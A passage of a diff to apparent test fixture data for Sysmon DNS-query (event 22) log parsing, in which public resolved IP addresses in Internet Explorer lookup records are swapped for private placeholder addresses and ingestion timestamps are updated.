"192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, @@ -13802,23 +13640,23 @@ "tags.rd.linksynergy.com" ], "ip": [ - "35.241.16.233", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742150700Z", + "ingested": "2021-12-09T13:50:23.457357900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.241.16.233;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.836Z", @@ -13886,11 +13724,11 @@ "type": "CNAME" }, { - "data": "199.187.193.166", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13898,7 +13736,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -13906,7 +13744,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -13914,19 +13752,19 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "199.187.193.166", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { @@ -13943,20 +13781,20 @@ "rtb-csync.smartadserver.com" ], "ip": [ - "199.187.193.166", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742156600Z", + "ingested": "2021-12-09T13:50:23.457363700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:199.187.193.166;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.836Z", @@ -14020,11 +13858,11 @@ "type": "CNAME" }, { - "data": "199.166.0.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -14032,7 +13870,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -14040,7 +13878,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -14048,7 +13886,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -14056,21 +13894,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "199.166.0.200", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -14086,22 +13924,22 @@ "sc.iasds01.com" ], "ip": [ - "199.166.0.200", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742161500Z", + "ingested": "2021-12-09T13:50:23.457369600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:199.166.0.200;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.836Z", @@ -14165,11 +14003,11 @@ "type": "CNAME" }, { - "data": "104.244.38.20", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -14177,7 +14015,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -14185,7 +14023,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -14193,7 +14031,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -14201,21 +14039,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "104.244.38.20", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -14231,22 +14069,22 @@ "dt.adsafeprotected.com" ], "ip": [ - "104.244.38.20", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742169100Z", + "ingested": "2021-12-09T13:50:23.457375400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:104.244.38.20;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:05.034Z", @@ -14314,12 +14152,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { @@ -14336,13 +14174,13 @@ "status.thawte.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742177500Z", + "ingested": "2021-12-09T13:50:23.457381100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:05.034Z", @@ -14421,47 +14259,47 @@ "type": "CNAME" }, { - "data": "38.134.110.101", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.143", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.171", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.177", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.115", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.104", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.114", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "38.134.110.101", - "38.134.110.143", - "38.134.110.141", - "38.134.110.171", - "38.134.110.177", - "38.134.110.115", - "38.134.110.104", - "38.134.110.114" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -14479,20 +14317,13 @@ "ads.stickyadstv.com" ], "ip": [ - "38.134.110.101", - "38.134.110.143", - "38.134.110.141", - "38.134.110.171", - "38.134.110.177", - "38.134.110.115", - "38.134.110.104", - "38.134.110.114" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742186Z", + "ingested": "2021-12-09T13:50:23.457387Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:38.134.110.101;::ffff:38.134.110.143;::ffff:38.134.110.141;::ffff:38.134.110.171;::ffff:38.134.110.177;::ffff:38.134.110.115;::ffff:38.134.110.104;::ffff:38.134.110.114;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData 